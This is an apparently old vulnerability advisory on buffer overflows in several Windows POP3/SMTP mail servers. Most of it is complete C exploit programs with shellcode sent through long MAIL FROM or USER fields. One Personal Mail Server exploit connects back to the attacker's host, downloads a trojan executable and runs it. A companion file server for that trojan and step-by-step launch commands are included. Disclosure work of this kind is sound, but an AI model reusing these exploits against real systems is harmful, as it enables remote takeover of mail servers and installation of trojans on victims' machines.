COMMAND
POP3/SMTP
SYSTEMS AFFECTED
Win32
PROBLEM
'UNYUN' found following. Many kind of POP3/SMTP server softwares
for Windows have buffer overflow bug (by The Shadow Penguin
Securuty).
Unyun confirmed many kind of POP3/SMTP servers for Windows which
are published on "SOFT-SEEK.com" contain the buffer overflow
bugs. POP3/SMTP server softwares which have buffer overflow bugs:
Software Version Service Overflow Point
-------------------------------------------------------
@Work SmartServer3 3.51 SMTP long MAIL FROM:
CMail Server 2.3 SP2 SMTP long MAIL FROM:
Personal Mail Server 3.09 SMTP long MAIL FROM: (notified to developer)
Tiny FTP daemon 0.51 POP3 long USER (notified, Now fixed)
Internet Anywhere 2.2.2 POP3 long USER
FuseMail 2.7 POP3 long USER,PASS
aVirt Mail Server 3.3 POP/SMTP long MAIL FROM:,long USER
If the host recives the packet which contains the exploit code,
the host has been cracked by any instructions which are coded in
the exploit code. We show the demonstration programs which
execute any command on the victim host. For the proof of the risk
of intrusion, Unyun also published the exploit program for
"Personal Mail Server" that can send a prepared program to victim
host and execute it. If the trojan program is sent, the victim
machine will be controlled remotely.
Coded are the exploits for the following softwares:
(1) @Work SmartServer3
(2) CMail Server
(3) FuseMail 2.7
(4) Personal Mail Server
(5) Tiny FTP daemon
Tiny FTP daemon is fixed, so exploit program for (1)-(4) follows.
(1) @Work SmartServer3
/*=============================================================================
NetcPlus SmartServer3 Exploit for Windows98
The Shadow Penguin Security (http://shadowpenguin.backsection.net)
Written by UNYUN (shadowpenguin@backsection.net)
=============================================================================
*/
#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/time.h>
#include <unistd.h>
#define BUFSIZE 2000
#define SMTP_PORT 25
#define RETADR 1167
#define JMPADR 1163
#define JMPOFS 6
#define EIP 0xbff7a06b
#define NOP 0x90
#define JMPS 0xeb
unsigned char exploit_code[200]={
0xEB,0x4B,0x5B,0x53,0x32,0xE4,0x83,0xC3,0x0B,
0x4B,0x88,0x23,0xB8,0x50,0x77,0xF7,0xBF,0xFF,
0xD0,0x8B,0xD0,0x52,0x43,0x53,0x52,0x32,0xE4,
0x83,0xC3,0x06,0x88,0x23,0xB8,0x28,0x6E,0xF7,
0xBF,0xFF,0xD0,0x8B,0xF0,0x5A,0x43,0x53,0x52,
0x32,0xE4,0x83,0xC3,0x04,0x88,0x23,0xB8,0x28,
0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,0xF8,0x43,0x53,
0x83,0xC3,0x0B,0x32,0xE4,0x88,0x23,0xFF,0xD6,
0x33,0xC0,0x50,0xFF,0xD7,0xE8,0xB0,0xFF,0xFF,
0xFF,0x00};
unsigned char cmdbuf[200]="msvcrt.dll.system.exit.welcome.exe";
int main(int argc,char *argv[])
{
struct hostent *hs;
struct sockaddr_in cli;
char packetbuf[BUFSIZE+3000],buf[BUFSIZE];
int sockfd,i,ip;
if (argc<2){
printf("usage\n %s HostName\n",argv[0]);
exit(1);
}
bzero(&cli, sizeof(cli));
cli.sin_family = AF_INET;
cli.sin_port = htons(SMTP_PORT);
if ((cli.sin_addr.s_addr=inet_addr(argv[1]))==-1){
if ((hs=gethostbyname(argv[1]))==NULL){
printf("Can not resolve specified host.\n");
exit(1);
}
cli.sin_family = hs->h_addrtype;
memcpy((caddr_t)&cli.sin_addr.s_addr,hs->h_addr,hs->h_length);
}
if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0){
perror("socket"); exit(0);
}
if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0){
perror("connect"); exit(0);
}
while((i=read(sockfd,packetbuf,sizeof(packetbuf))) > 0){
packetbuf[i]=0;
if(strchr(packetbuf,'\n')!=NULL) break;
}
strcat(exploit_code,cmdbuf);
exploit_code[65]=strlen(cmdbuf+23);
memset(buf,0x90,BUFSIZE);
ip=EIP;
buf[RETADR ]=ip&0xff;
buf[RETADR+1]=(ip>>8)&0xff;
buf[RETADR+2]=(ip>>16)&0xff;
buf[RETADR+3]=(ip>>24)&0xff;
buf[JMPADR] =JMPS;
buf[JMPADR+1]=JMPOFS;
memcpy(buf+RETADR+4,exploit_code,strlen(exploit_code));
buf[2000]=0;
sprintf(packetbuf,"helo penguin\r\n");
write(sockfd,packetbuf,strlen(packetbuf));
while((i=read(sockfd,packetbuf,sizeof(packetbuf))) > 0){
packetbuf[i]=0;
if(strchr(packetbuf,'\n')!=NULL) break;
}
printf("%s\n",packetbuf);
sprintf(packetbuf,"MAIL FROM: %s\r\n",buf);
write(sockfd,packetbuf,strlen(packetbuf));
sleep(100);
close(sockfd);
}
(2) CMail Server
/*=============================================================================
CMAIL Server 2.3 SP2 Exploit for Windows98
The Shadow Penguin Security (http://shadowpenguin.backsection.net)
Written by UNYUN (shadowpenguin@backsection.net)
=============================================================================
*/
#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/time.h>
#include <unistd.h>
#define BUFSIZE 2000
#define SMTP_PORT 25
#define RETADR 626
#define JMPADR 622
#define JMPOFS 6
#define EIP 0xbff7a06b
#define NOP 0x90
#define JMPS 0xeb
unsigned char exploit_code[200]={
0xEB,0x4B,0x5B,0x53,0x32,0xE4,0x83,0xC3,0x0B,
0x4B,0x88,0x23,0xB8,0x50,0x77,0xF7,0xBF,0xFF,
0xD0,0x8B,0xD0,0x52,0x43,0x53,0x52,0x32,0xE4,
0x83,0xC3,0x06,0x88,0x23,0xB8,0x28,0x6E,0xF7,
0xBF,0xFF,0xD0,0x8B,0xF0,0x5A,0x43,0x53,0x52,
0x32,0xE4,0x83,0xC3,0x04,0x88,0x23,0xB8,0x28,
0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,0xF8,0x43,0x53,
0x83,0xC3,0x0B,0x32,0xE4,0x88,0x23,0xFF,0xD6,
0x33,0xC0,0x50,0xFF,0xD7,0xE8,0xB0,0xFF,0xFF,
0xFF, 0x00};
unsigned char cmdbuf[200]="msvcrt.dll.system.exit.welcome.exe";
int main(int argc,char *argv[])
{
struct hostent *hs;
struct sockaddr_in cli;
char packetbuf[BUFSIZE+3000],buf[BUFSIZE];
int sockfd,i,ip;
if (argc<2){
printf("usage\n %s HostName\n",argv[0]);
exit(1);
}
bzero(&cli, sizeof(cli));
cli.sin_family = AF_INET;
cli.sin_port = htons(SMTP_PORT);
if ((cli.sin_addr.s_addr=inet_addr(argv[1]))==-1){
if ((hs=gethostbyname(argv[1]))==NULL){
printf("Can not resolve specified host.\n");
exit(1);
}
cli.sin_family = hs->h_addrtype;
memcpy((caddr_t)&cli.sin_addr.s_addr,hs->h_addr,hs->h_length);
}
if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0){
perror("socket"); exit(0);
}
if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0){
perror("connect"); exit(0);
}
while((i=read(sockfd,packetbuf,sizeof(packetbuf))) > 0){
packetbuf[i]=0;
if(strchr(packetbuf,'\n')!=NULL) break;
}
strcat(exploit_code,cmdbuf);
exploit_code[65]=strlen(cmdbuf+23);
memset(buf,0x90,BUFSIZE);
ip=EIP;
buf[RETADR ]=ip&0xff;
buf[RETADR+1]=(ip>>8)&0xff;
buf[RETADR+2]=(ip>>16)&0xff;
buf[RETADR+3]=(ip>>24)&0xff;
buf[JMPADR] =JMPS;
buf[JMPADR+1]=JMPOFS;
memcpy(buf+RETADR+4,exploit_code,strlen(exploit_code));
buf[BUFSIZE]=0;
sprintf(packetbuf,"helo penguin\r\n");
write(sockfd,packetbuf,strlen(packetbuf));
while((i=read(sockfd,packetbuf,sizeof(packetbuf))) > 0){
packetbuf[i]=0;
if(strchr(packetbuf,'\n')!=NULL) break;
}
printf("%s\n",packetbuf);
sprintf(packetbuf,"MAIL FROM: aa <%s@aa.com>\r\n",buf);
write(sockfd,packetbuf,strlen(packetbuf));
sleep(100);
close(sockfd);
}
(3) FuseMail 2.7
/*=============================================================================
FuseMail Version 2.7 Exploit for Windows98
The Shadow Penguin Security (http://shadowpenguin.backsection.net)
Written by UNYUN (shadowpenguin@backsection.net)
=============================================================================
*/
#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/time.h>
#include <unistd.h>
#define BUFSIZE 1159
#define RETADR 1074
#define FTP_PORT 110
#define JMP_ESP 0xbff7a027
unsigned char exploit_code[200]={
0xEB,0x32,0x5B,0x53,0x32,0xE4,0x83,0xC3,
0x0B,0x4B,0x88,0x23,0xB8,0x50,0x77,0xF7,
0xBF,0xFF,0xD0,0x43,0x53,0x50,0x32,0xE4,
0x83,0xC3,0x06,0x88,0x23,0xB8,0x28,0x6E,
0xF7,0xBF,0xFF,0xD0,0x8B,0xF0,0x43,0x53,
0x83,0xC3,0x0B,0x32,0xE4,0x88,0x23,0xFF,
0xD6,0x90,0xEB,0xFD,0xE8,0xC9,0xFF,0xFF,
0xFF,0x00
};
unsigned char cmdbuf[200]="msvcrt.dll.system.notepad.exe";
int main(int argc,char *argv[])
{
struct hostent *hs;
struct sockaddr_in cli;
char packetbuf[3000],buf[1500];
int sockfd,i,ip;
if (argc<2){
printf("usage\n %s HostName\n",argv[0]);
exit(1);
}
bzero(&cli, sizeof(cli));
cli.sin_family = AF_INET;
cli.sin_port = htons(FTP_PORT);
if ((cli.sin_addr.s_addr=inet_addr(argv[1]))==-1){
if ((hs=gethostbyname(argv[1]))==NULL){
printf("Can not resolve specified host.\n");
exit(1);
}
cli.sin_family = hs->h_addrtype;
memcpy((caddr_t)&cli.sin_addr.s_addr,hs->h_addr,hs->h_length);
}
if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0){
perror("socket"); exit(0);
}
if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0){
perror("connect"); exit(0);
}
while((i=read(sockfd,packetbuf,sizeof(packetbuf))) > 0){
packetbuf[i]=0;
if(strchr(packetbuf,'\n')!=NULL) break;
}
strcat(exploit_code,cmdbuf);
memset(buf,'a',BUFSIZE);
buf[BUFSIZE]=0;
ip=JMP_ESP;
buf[RETADR ]=ip&0xff;
buf[RETADR+1]=(ip>>8)&0xff;
buf[RETADR+2]=(ip>>16)&0xff;
buf[RETADR+3]=(ip>>24)&0xff;
strncpy(buf+RETADR+4,exploit_code,strlen(exploit_code));
sprintf(packetbuf,"USER %s\r\n",buf);
write(sockfd,packetbuf,strlen(packetbuf));
while((i=read(sockfd,packetbuf,sizeof(packetbuf))) > 0){
packetbuf[i]=0;
if(strchr(packetbuf,'\n')!=NULL) break;
}
memset(packetbuf,0,1024);
sprintf(packetbuf,"PASS sample\r\n");
write(sockfd,packetbuf,strlen(packetbuf));
close(sockfd);
}
(4) Personal Mail Server
Prog.1 : This program sends the very small client program which
can execute the trojan after the translation from other
host.
Prog.2 : Program Translation Server. The Program Translation
Server which is used by Prog.1
Prog.1
/*=============================================================================
Personal Mail Server Version 3.072-3.09 Exploit for Windows98
The Shadow Penguin Security (http://shadowpenguin.backsection.net)
Written by UNYUN (shadowpenguin@backsection.net)
=============================================================================
*/
#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/time.h>
#include <unistd.h>
#define BUFSIZE 4000
#define SMTP_PORT 25
#define RETADR 267
#define JMPADR 263
#define JMPOFS 6
#define EIP 0xbff7a06b
#define NOP 0x90
#define JMPS 0xeb
unsigned char exploit_code[700]={
0xEB,0x58,0x5F,0x32,0xC0,0x8B,0xDF,0x33,0xC9,0xB1,0x09,0xFE,0xC1,0x03,0xD9,0x88,
0x03,0x88,0x47,0x16,0x88,0x47,0x21,0x88,0x47,0x28,0x88,0x47,0x30,0x88,0x47,0x35,
0x88,0x47,0x41,0x88,0x47,0x47,0x88,0x47,0x4E,0x88,0x47,0x55,0x88,0x47,0x58,0x88,
0x47,0x5E,0x88,0x47,0x65,0x88,0x47,0x6A,0x8B,0xC7,0x50,0xB8,0x50,0x77,0xF7,0xBF,
0xFF,0xD0,0x89,0x47,0x6E,0x8B,0xC7,0x33,0xC9,0xB1,0x0B,0x03,0xC1,0x50,0xB8,0x50,
0x77,0xF7,0xBF,0xFF,0xD0,0x89,0x47,0x72,0xEB,0x02,0xEB,0x72,0x8B,0xC7,0x33,0xC9,
0xB1,0x17,0x03,0xC1,0x50,0xFF,0x77,0x72,0xB8,0x28,0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,
0xF0,0x8B,0xC7,0x33,0xC9,0xB1,0x82,0x03,0xC1,0x50,0x33,0xC0,0xB0,0x02,0x50,0xFF,
0xD6,0x57,0x33,0xC9,0xB1,0x82,0x03,0xF9,0x33,0xC9,0x66,0xB9,0x90,0x01,0x33,0xC0,
0xF3,0xAA,0x5F,0x8B,0xC7,0x33,0xC9,0xB1,0x22,0x03,0xC1,0x50,0xFF,0x77,0x72,0xB8,
0x28,0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,0xF0,0x33,0xC0,0x50,0x40,0x50,0x40,0x50,0xFF,
0xD6,0x89,0x47,0x76,0x8B,0xDF,0x33,0xC9,0xB1,0x82,0x03,0xD9,0xC6,0x03,0x02,0x66,
0xC7,0x43,0x02,0x1B,0x58,0xC7,0x43,0x04,0xEE,0xEE,0xEE,0xEE,0xEB,0x02,0xEB,0x56,
0x8B,0xC7,0x33,0xC9,0xB1,0x29,0x03,0xC1,0x50,0xFF,0x77,0x72,0xB8,0x28,0x6E,0xF7,
0xBF,0xFF,0xD0,0x8B,0xF0,0x33,0xC0,0xB0,0x10,0x50,0x8B,0xC7,0x33,0xC9,0xB1,0x82,
0x03,0xC1,0x50,0xFF,0x77,0x76,0xFF,0xD6,0x8B,0xC7,0x33,0xC9,0xB1,0x42,0x03,0xC1,
0x50,0xFF,0x77,0x6E,0xB8,0x28,0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,0xF0,0x8B,0xC7,0x33,
0xC9,0xB1,0x56,0x03,0xC1,0x50,0x8B,0xC7,0x33,0xC9,0xB1,0x59,0x03,0xC1,0x50,0xFF,
0xD6,0x89,0x47,0x7A,0xEB,0x02,0xEB,0x63,0x8B,0xC7,0x33,0xC9,0xB1,0x31,0x03,0xC1,
0x50,0xFF,0x77,0x72,0xB8,0x28,0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,0xF0,0x33,0xC0,0x50,
0x66,0xB8,0xE8,0x03,0x50,0x8B,0xC7,0x33,0xC9,0xB1,0x82,0x03,0xC1,0x50,0xFF,0x77,
0x76,0xFF,0xD6,0x89,0x47,0x7E,0x33,0xDB,0x3B,0xC3,0x74,0x31,0x72,0x2F,0x8B,0xC7,
0x33,0xC9,0xB1,0x48,0x03,0xC1,0x50,0xFF,0x77,0x6E,0xB8,0x28,0x6E,0xF7,0xBF,0xFF,
0xD0,0x8B,0xF0,0xFF,0x77,0x7A,0xFF,0x77,0x7E,0x33,0xC0,0xB0,0x01,0x50,0x8B,0xC7,
0x33,0xC9,0xB1,0x82,0x03,0xC1,0x50,0xFF,0xD6,0xEB,0x9D,0xEB,0x6C,0x8B,0xC7,0x33,
0xC9,0xB1,0x36,0x03,0xC1,0x50,0xFF,0x77,0x72,0xB8,0x28,0x6E,0xF7,0xBF,0xFF,0xD0,
0x8B,0xF0,0xFF,0x77,0x76,0xFF,0xD6,0x8B,0xC7,0x33,0xC9,0xB1,0x4F,0x03,0xC1,0x50,
0xFF,0x77,0x6E,0xB8,0x28,0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,0xF0,0xFF,0x77,0x7A,0xFF,
0xD6,0x8B,0xC7,0x33,0xC9,0xB1,0x5F,0x03,0xC1,0x50,0xFF,0x77,0x6E,0xB8,0x28,0x6E,
0xF7,0xBF,0xFF,0xD0,0x8B,0xF0,0x8B,0xC7,0x33,0xC9,0xB1,0x59,0x03,0xC1,0x50,0xFF,
0xD6,0x8B,0xC7,0x33,0xC9,0xB1,0x66,0x03,0xC1,0x50,0xFF,0x77,0x6E,0xB8,0x28,0x6E,
0xF7,0xBF,0xFF,0xD0,0x33,0xDB,0x53,0xFF,0xD0,0x90,0xE8,0x03,0xFE,0xFF,0xFF,0x6D,
0x73,0x76,0x63,0x72,0x74,0x2E,0x64,0x6C,0x6C,0x2C,0x77,0x73,0x6F,0x63,0x6B,0x33,
0x32,0x2E,0x64,0x6C,0x6C,0x2C,0x57,0x53,0x41,0x53,0x74,0x61,0x72,0x74,0x75,0x70,
0x2C,0x73,0x6F,0x63,0x6B,0x65,0x74,0x2C,0x63,0x6F,0x6E,0x6E,0x65,0x63,0x74,0x2C,
0x72,0x65,0x63,0x76,0x2C,0x63,0x6C,0x6F,0x73,0x65,0x73,0x6F,0x63,0x6B,0x65,0x74,
0x2C,0x66,0x6F,0x70,0x65,0x6E,0x2C,0x66,0x77,0x72,0x69,0x74,0x65,0x2C,0x66,0x63,
0x6C,0x6F,0x73,0x65,0x2C,0x77,0x62,0x2C,0x78,0x2E,0x65,0x78,0x65,0x2C,0x73,0x79,
0x73,0x74,0x65,0x6D,0x2C,0x65,0x78,0x69,0x74,0x2C,0x2C,0x2C,0x2C,0x00
};
int main(int argc,char *argv[])
{
struct hostent *hs;
struct sockaddr_in cli;
char packetbuf[BUFSIZE+3000],buf[BUFSIZE];
int sockfd,i;
unsigned int ip,port,yourip;
if (argc<3){
printf("usage\n %s VictimHostName YourHostName\n",argv[0]);
exit(1);
}
if ((yourip=inet_addr(argv[2]))==-1){
if ((hs=gethostbyname(argv[2]))==NULL){
printf("Can not resolve specified YourHost.\n");
exit(1);
}
memcpy((caddr_t)&yourip,hs->h_addr,hs->h_length);
}
bzero(&cli, sizeof(cli));
cli.sin_family = AF_INET;
cli.sin_port = htons(SMTP_PORT);
if ((cli.sin_addr.s_addr=inet_addr(argv[1]))==-1){
if ((hs=gethostbyname(argv[1]))==NULL){
printf("Can not resolve specified VictimHost.\n");
exit(1);
}
cli.sin_family = hs->h_addrtype;
memcpy((caddr_t)&cli.sin_addr.s_addr,hs->h_addr,hs->h_length);
}
if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0){
perror("socket"); exit(0);
}
if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0){
perror("connect"); exit(0);
}
while((i=read(sockfd,packetbuf,sizeof(packetbuf))) > 0){
packetbuf[i]=0;
if(strchr(packetbuf,'\n')!=NULL) break;
}
printf("1:%s\n",packetbuf);
memset(buf,0x90,BUFSIZE);
for (i=267;i<271;i++) buf[i]=0x30;
ip=EIP;
buf[RETADR ]=ip&0xff;
buf[RETADR+1]=(ip>>8)&0xff;
buf[RETADR+2]=(ip>>16)&0xff;
buf[RETADR+3]=(ip>>24)&0xff;
buf[JMPADR] =JMPS;
buf[JMPADR+1]=JMPOFS;
port=7000;
exploit_code[0xc3]=(port>>8) & 0xff;
exploit_code[0xc4]=port & 0xff;
ip=htonl(yourip);
exploit_code[0xc8]=(ip>>24) & 0xff;
exploit_code[0xc9]=(ip>>16) & 0xff;
exploit_code[0xca]=(ip>>8) & 0xff;
exploit_code[0xcb]=ip & 0xff;
memcpy(buf+RETADR+4,exploit_code,strlen(exploit_code));
buf[BUFSIZE]=0;
sprintf(packetbuf,"helo penguin\r\n");
write(sockfd,packetbuf,strlen(packetbuf));
while((i=read(sockfd,packetbuf,sizeof(packetbuf))) > 0){
packetbuf[i]=0;
if(strchr(packetbuf,'\n')!=NULL) break;
}
printf("%s\n",packetbuf);
sprintf(packetbuf,"MAIL FROM: %s\r\n",buf);
write(sockfd,packetbuf,strlen(packetbuf));
close(sockfd);
}
Prog.2
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <errno.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#define PORT_NUM 7000
#define BUFSIZE 1000
#define SENDFILE "test.exe"
int get_connection(port, listener)
int port;
int *listener;
{
struct sockaddr_in address,acc;
int listening_socket,connected_socket;
int reuse_addr=1,acclen=sizeof(acc);
memset((char *) &address, 0, sizeof(address));
address.sin_family = AF_INET;
address.sin_port = htons(port);
address.sin_addr.s_addr = htonl(INADDR_ANY);
listening_socket = socket(AF_INET, SOCK_STREAM, 0);
if (listening_socket < 0) {
perror("socket"); exit(1);
}
if (listener != NULL) *listener = listening_socket;
setsockopt(listening_socket,SOL_SOCKET,SO_REUSEADDR,
(void *)&reuse_addr,sizeof(reuse_addr));
if (bind(listening_socket,(struct sockaddr *)&address,
sizeof(address))<0){
perror("bind"); exit(1);
}
listen(listening_socket, 5);
connected_socket=accept(listening_socket,
(struct sockaddr *)&acc,&acclen);
return connected_socket;
}
int main(argc, argv)
int argc;
char *argv[];
{
int sock,listensock,i,r,l;
char buf[BUFSIZE];
struct stat st;
FILE *fp;
if ((fp=fopen(SENDFILE,"rb"))==NULL){
printf("File not found \"%s\"\n",SENDFILE);
exit(1);
}
stat(SENDFILE,&st);
r=st.st_size/BUFSIZE+1;
sock = get_connection(PORT_NUM, &listensock);
for (i=0;;i++){
l=fread(buf,1,BUFSIZE,fp);
if (l<=0) break;
write(sock,buf,l);
}
fclose(fp);
close(sock);
}
Demonstration:
Victim host : 192.168.200.200
Your host : 192.168.100.100
(1) copy your testprogram "test.exe" to UNIX machine.
(2) gcc ex_pms1.c -o pms1
(3) gcc sendexp.c -o sendexp
(4) ./sendexp &
(5) ./pms1 192.168.200.200 192.168.100.100
You can send "test.exe" to victim host, and can execute it
remotely. The size of "test.exe" is not limited.
SOLUTION
To be fixed.... contact your vendor.